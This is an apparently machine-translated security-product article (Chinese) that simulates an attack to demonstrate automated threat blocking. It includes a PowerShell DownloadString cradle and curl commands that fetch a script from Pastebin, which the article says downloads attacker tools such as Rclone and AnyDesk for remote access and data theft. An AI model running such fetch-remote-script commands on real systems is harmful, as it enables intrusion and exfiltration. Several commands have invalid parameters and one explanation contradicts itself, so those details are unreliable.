展示代理威胁防护如何保护您的网络

Prev Next

概概览

代理威胁防护是一个安全引擎,在检测到威胁时主动应用动态控制,减少攻击面,提前缓解威胁,在发生任何影响之前。有关更多信息,请参阅什么是代理威胁防护?

本文模拟一个真实世界攻击场景,以展示代理威胁防护如何保护您的网络。虽然这不是一个代理威胁,但它展示了如何应用控制措施来防止类似技巧被用于代理攻击。

在此示例中,用户从Pastebin下载了一个脚本,攻击者尝试使用该脚本来检索执行未来攻击所需的其他高风险工具。代理威胁防护识别恶意行为并阻止工具的下载,在攻击进程和任何影响发生之前进行防御。

对此攻击的响应是完全自动化的。无需额外的规则。仅启用代理威胁防护即可防止攻击。

模拟此攻击:

  1. 下载高风险工具而不被阻止

  2. 从Pastebin下载脚本

  3. 尝试再次下载高风险工具。此时,下载被阻止。

    注意:虽然这种情况不是自主的,但它说明了控制机制如何帮助防止类似技术在自主攻击中被使用。

条件

  • 代理威胁防护已启用,操作设置为阻止

步骤 1: 下载高风险工具

为了展示代理威胁防护仅在其为恶意序列的组成部分时才阻止操作,首先下载Rclone,一个用于管理文件的开源命令行工具。攻击者通常将Rclone用作后妥协工具,因为它是合法的、强大的,并且与正常管理活动融为一体。

动作

从以下位置下载Rclone:

  • 以下网址:https://downloads.rclone.org/rclone-current-windows-amd64.zip

  • 在Windows设备上:

    • 以下PowerShell命令:Start-Process "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -Label "RClone"

  • 在macOS/Linux设备上:

    • 以下终端命令:curl -sSL "https://downloads.rclone.org/rclone-current-windows-amd64.zip"

结果

文件下载成功。

解释

这确认了在孤立的情况下,操作未被阻止,因为在可疑活动未发生时,该操作不被认为是恶意的。

步骤 2: 从Pastebin下载脚本

为了模拟攻击的开始,从Pastebin下载一个脚本,该脚本运行后下载常见的攻击者工具,例如用于远程访问和数据泄露的Rclone和AnyDesk。

动作

从Pastebin下载并运行脚本:

  • 在Windows设备上:

    • 以下PowerShell命令:(New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/C5VxKUpE')

  • 在macOS/Linux设备上:

    • 以下终端命令:curl -sSL "https://pastebin.com/raw/tXhVK2V7"

结果

脚本运行并下载工具。动态控制已应用于主机,显示在代理威胁页面。有关更多信息,请参阅监控代理威胁防护

解释

代理威胁防护检测到可疑行为指标,主动实施控制以阻止后续恶意行为,在影响发生之前停止攻击。

步骤 3: 下载高风险工具

在模拟攻击中,攻击者试图下载Rclone。然而,由于此操作跟随下载Pastebin脚本的可疑活动,并且应用了控制,代理威胁防护阻止了Rclone下载。

动作

使用以下任意选项下载Rclone:

  • 直接从Rclone站点下载:https://downloads.rclone.org/rclone-current-windows-amd64.zip

  • 此PowerShell命令(在Windows上):Start-Process -Url "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -Label "RClone"

  • 以下终端命令(开macOS/Linux):curl -sSL "https://downloads.rclone.org/rclone-current-windows-amd64.zip"

结果

文件的下载被控制阻止。已缓解的威胁显示在代理威胁页面。

解释

与步骤1不同,此脚本在隔离环境中运行,因此被允许,现在由于之前有可疑行为,此脚本的下载被代理威胁防护阻止。

演示

此视频展示了这个模拟攻击的演示: